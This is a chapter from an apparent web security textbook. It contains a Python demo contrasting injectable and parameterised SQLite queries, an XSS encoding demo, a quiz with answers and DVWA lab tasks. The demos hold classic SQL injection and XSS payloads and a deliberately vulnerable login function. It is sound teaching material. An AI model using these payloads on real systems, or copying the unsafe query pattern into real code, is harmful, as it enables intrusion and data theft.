Web applications are the primary attack surface for most organizations: they are internet-facing, complex, written by many developers over years, and directly handle sensitive data. The OWASP Top 10 risks are found in the majority of applications tested; they are not rare edge cases. A developer who understands injection, XSS, and broken auth and applies the corresponding fixes as a matter of routine produces far fewer vulnerabilities than one who relies on scanners to catch what they missed.

News in Focus: SQL Injection Breaches That Persist#

SQL injection vulnerabilities in web applications continue to produce major breaches despite being one of the oldest and best-understood vulnerability classes. Several headline breaches of credit card processors, retailers, and government agencies in the last decade were attributed to SQLi in applications that were not using parameterised queries, despite the fix being well-documented since the late 1990s. The persistence of this vulnerability class reflects the cost of not making secure coding practices a hiring and review requirement.

# Chapter 10 -- Safe SQLi demonstration with SQLite
import sqlite3, re

# ── Safe vs unsafe query comparison ────────────────────────────────────────────
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.executescript(
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT);"
    "INSERT INTO users VALUES (1,'alice','admin');"
    "INSERT INTO users VALUES (2,'bob','user');"
    "INSERT INTO users VALUES (3,'carol','user');"
)

def unsafe_login(username):
    # NEVER do this in real code
    query = f"SELECT * FROM users WHERE username = '{username}'"
    try:
        return cur.execute(query).fetchall()
    except Exception as e:
        return [f"DB ERROR: {e}"]

def safe_login(username):
    # Parameterised query: data can NEVER become code
    return cur.execute("SELECT * FROM users WHERE username = ?", (username,)).fetchall()

print("=== Safe vs Unsafe SQL Query Demo ===\n")
tests = [
    ("Normal input",        "alice"),
    ("SQLi bypass attempt", "' OR 1=1 --"),
    ("Union extraction",    "' UNION SELECT id,username,role FROM users --"),
]

for label, payload in tests:
    unsafe_result = unsafe_login(payload)
    safe_result   = safe_login(payload)
    print(f"  Input ({label}): {payload!r}")
    print(f"    Unsafe query returned : {unsafe_result}")
    print(f"    Safe query returned   : {safe_result}")
    print()

conn.close()

# ── XSS output encoding demo ──────────────────────────────────────────────────
import html

xss_payloads = [
    '<script>alert(1)</script>',
    '"><img src=x onerror=alert(1)>',
    "javascript:alert('xss')",
]

print("=== XSS Output Encoding Demo ===")
for p in xss_payloads:
    encoded = html.escape(p)
    print(f"  Raw    : {p}")
    print(f"  Encoded: {encoded}\n")

=== Safe vs Unsafe SQL Query Demo ===

  Input (Normal input): 'alice'
    Unsafe query returned : [(1, 'alice', 'admin')]
    Safe query returned   : [(1, 'alice', 'admin')]

  Input (SQLi bypass attempt): "' OR 1=1 --"
    Unsafe query returned : [(1, 'alice', 'admin'), (2, 'bob', 'user'), (3, 'carol', 'user')]
    Safe query returned   : []

  Input (Union extraction): "' UNION SELECT id,username,role FROM users --"
    Unsafe query returned : [(1, 'alice', 'admin'), (2, 'bob', 'user'), (3, 'carol', 'user')]
    Safe query returned   : []

=== XSS Output Encoding Demo ===
  Raw    : <script>alert(1)</script>
  Encoded: &lt;script&gt;alert(1)&lt;/script&gt;

  Raw    : "><img src=x onerror=alert(1)>
  Encoded: &quot;&gt;&lt;img src=x onerror=alert(1)&gt;

  Raw    : javascript:alert('xss')
  Encoded: javascript:alert(&#x27;xss&#x27;)

Review Questions (MCQ)#

Q1. The root cause of SQL injection is: A. Using a database B. Constructing queries by concatenating user-supplied strings C. Using HTTP D. Missing HTTPS

Q2. A parameterised query prevents SQLi because: A. It encrypts the query B. Data is sent separately from query structure and cannot become SQL code C. It validates input length D. It uses a stored procedure

Q3. Stored XSS is more dangerous than reflected XSS because: A. It affects more browsers B. It persists in the database and executes for every victim who views the page C. It is harder to detect D. It bypasses TLS

Q4. CSRF is mitigated by the SameSite=Strict cookie attribute because: A. Cookies are encrypted B. Cookies are not sent with cross-origin requests C. The cookie expires immediately D. The cookie is HttpOnly

Q5. SSRF in a cloud environment is particularly severe because: A. It bypasses firewalls B. The Instance Metadata Service exposes IAM credentials C. It causes DDoS D. It breaks TLS

Q6. IDOR vulnerabilities are in the OWASP category: A. Cryptographic Failures B. Broken Access Control C. Injection D. Security Misconfiguration

Q7. The Content-Security-Policy header primarily mitigates: A. SQL injection B. CSRF C. XSS by restricting executable content sources D. Session fixation

Q8. The HSTS header forces: A. HTTP-only connections B. HTTPS-only connections for the defined period C. Encrypted cookies D. SameSite cookies

Q9. A WAF is best described as: A. A complete replacement for secure code B. A compensating control that filters known attack patterns C. A vulnerability scanner D. An intrusion detection system

Q10. DOM-based XSS differs from reflected XSS in that the payload: A. Requires a database B. Never touches the server; injected and executed entirely in the browser C. Is persistent D. Only works in Internet Explorer

Answers: Q1 B, Q2 B, Q3 B, Q4 B, Q5 B, Q6 B, Q7 C, Q8 B, Q9 B, Q10 B.

Lab Assignment#

Part A – SQLi: Using DVWA or SQLi-labs (locally), find and exploit at least two forms of SQL injection (error-based and blind). Document: the vulnerable parameter, the injection payload, the database version and at least one table name extracted.

Part B – XSS: In DVWA, find and demonstrate reflected, stored, and DOM-based XSS. For each, document: the injection point, the payload, and the impact (what could an attacker do with this XSS).

Part C – Security headers audit: Use curl -I https://<any-public-site> on three websites you are not targeting maliciously (large companies with public bug bounty programs). Document which security headers are present and which are missing. Grade each site A-F.

Part D – CSRF protection analysis: Inspect the login and account-update forms of a web application you own or are authorized to test. Identify whether CSRF tokens are present, whether they are validated server-side, and whether SameSite attributes are set on session cookies.

References#

[OWASPFoundation21]

OWASP Foundation. Owasp top 10:2021. https://owasp.org/Top10/, 2021.

[OWASPFoundation25]

OWASP Foundation. Owasp top 10:2025. https://owasp.org/Top10/2025/, 2025.

OWASP Foundation (2025). OWASP Top 10:2025. https://owasp.org/Top10/2025/
OWASP. Damn Vulnerable Web Application (DVWA); WebGoat; ZAP. https://owasp.org/
OWASP Cheat Sheet Series: SQL Injection Prevention, Cross-Site Scripting Prevention, Session Management.